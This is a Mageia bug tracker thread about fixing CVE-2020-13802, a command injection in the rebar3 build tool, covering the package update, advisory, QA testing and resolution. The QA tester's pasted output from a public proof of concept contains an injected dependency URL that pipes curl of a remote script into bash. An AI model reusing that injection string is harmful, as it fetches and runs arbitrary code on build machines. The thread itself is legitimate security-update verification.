This package has a mga7 suffix under Cauldron/Mageia 8. Assigning to package maintainer.
Rebar3 versions 3.0.0-beta.3 to 3.13.2 are vulnerable to OS command injection via URL parameter of dependency specification.
QA Contact: (none) => securityComponent: RPM Packages => SecurityCVE: (none) => CVE-2020-13802URL: (none) => https://nvd.nist.gov/vuln/detail/CVE-2020-13802CC: (none) => zombie_ryushu
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-13802 Fixed upstream in 3.14.3. Mageia 7 is also affected. Package needs to be dropped from Cauldron before the Mageia 8 release if it is not buildable. Nothing requires it, but I'm not sure about BuildRequires.
Whiteboard: (none) => MGA7TOOSummary: mga7 suffix for package erlang-rebar3 => erlang-rebar3 new security issue CVE-2020-13802CC: (none) => jani.valimaa
erlang-rebar3-3.14.3-2.mga8 uploaded for Cauldron by Jani.
Whiteboard: MGA7TOO => (none)Version: Cauldron => 7Target Milestone: Mageia 8 => ---
Patched package uploaded by Jani for Mageia 7. Advisory: ======================== Updated erlang-rebar3 package fixes security vulnerability: Rebar3 versions 3.0.0-beta.3 to 3.13.2 are vulnerable to OS command injection via URL parameter of dependency specification (CVE-2020-13802). References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-13802 ======================== Updated packages in core/updates_testing: ======================== erlang-rebar3-3.9.0-1.1.mga7 from erlang-rebar3-3.9.0-1.1.mga7.src.rpm
Assignee: pkg-bugs => qa-bugs
mga7, x64 Installed erlang-rebar and 63 other packages. CVE-2020-13802 https://github.com/vulnbe/poc-rebar3 $ git clone https://github.com/vulnbe/poc-rebar3.git $ cd poc-rebar3 ===> Verifying dependencies... ===> Fetching dephelper ({hg,"https://github.com/vulnbe/poc-rebar3-helper.git?repo=main&threadId=19:428af44abb014e318e7d225a4a88acc2@thread.tacv2&ctx=channel|curl\t-fsSL\thttps://gist.githubusercontent.com/vulnbe/6e5ec8fae3bdbee8e5f11f15c1462e48/raw/94616f0ee52935fda458c889d6f686958c79a2c8/poc.sh|bash\t-|git\tclone\thttps://github.com/vulnbe/poc-rebar3-helper.git", "dephelper"}) ===> hg not installed ===> Failed to fetch and copy dep: {hg,"https://github.com/vulnbe/poc-rebar3-helper.git?repo=main&threadId=19:428af44abb014e318e7d225a4a88acc2@thread.tacv2&ctx=channel|curl\t-fsSL\thttps://gist.githubusercontent.com/vulnbe/6e5ec8fae3bdbee8e5f11f15c1462e48/raw/94616f0ee52935fda458c889d6f686958c79a2c8/poc.sh|bash\t-|git\tclone\thttps://github.com/vulnbe/poc-rebar3-helper.git", "dephelper"} Enabled updates-testing. $ sudo urpmi.update -a Too early to pick up the update. Continuing this thread later.
CC: (none) => tarazed25
Oops. Forgot to cut-and-paste 'rebar3 clean' $ git clone https://github.com/vulnbe/poc-rebar3.git $ cd poc-rebar3 $ rebar3 clean Updated the package. $ rebar3 clean ===> Verifying dependencies... $ Guessing that we are not required to exercize erlang in its entirety. This test shows that rebar3 is working as expected.
Whiteboard: (none) => MGA7-64-OK
Whiteboard: MGA7-64-OK => (none)
Retrace. Failed to check the poc-rebar3 directory. $ git clone https://github.com/vulnbe/poc-rebar3.git $ cd poc-rebar3 $ ls LICENSE README.md rebar.config src/ $ rebar3 clean ===> Verifying dependencies... ===> Fetching dephelper ({hg,"https://github.com/vulnbe/poc-rebar3-helper.git?repo=main&threadId=19:428af44abb014e318e7d225a4a88acc2@thread.tacv2&ctx=channel|curl\t-fsSL\thttps://gist.githubusercontent.com/vulnbe/6e5ec8fae3bdbee8e5f11f15c1462e48/raw/94616f0ee52935fda458c889d6f686958c79a2c8/poc.sh|bash\t-|git\tclone\thttps://github.com/vulnbe/poc-rebar3-helper.git", "dephelper"}) ===> hg not installed ===> Failed to fetch and copy dep: {hg,"https://github.com/vulnbe/poc-rebar3-helper.git?repo=main&threadId=19:428af44abb014e318e7d225a4a88acc2@thread.tacv2&ctx=channel|curl\t-fsSL\thttps://gist.githubusercontent.com/vulnbe/6e5ec8fae3bdbee8e5f11f15c1462e48/raw/94616f0ee52935fda458c889d6f686958c79a2c8/poc.sh|bash\t-|git\tclone\thttps://github.com/vulnbe/poc-rebar3-helper.git", "dephelper"} No change apparently. No changes to the directories. Running 'rebar3 clean' again returns the same messages. The rebar.config file contains what appears to be the OS injection code. My take on this is that the attack was rejected both before and after the update which probably validates erlang-rebar. Waiting for comments.
Note that after installing mercurial hg was available but the poc messages were unchanged.
If nobody objects shall give this the green light.
Validating Advisory pushed to SVN.
CC: (none) => sysadmin-bugsKeywords: (none) => advisory, validated_update
An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2020-0470.html
Resolution: (none) => FIXEDStatus: NEW => RESOLVED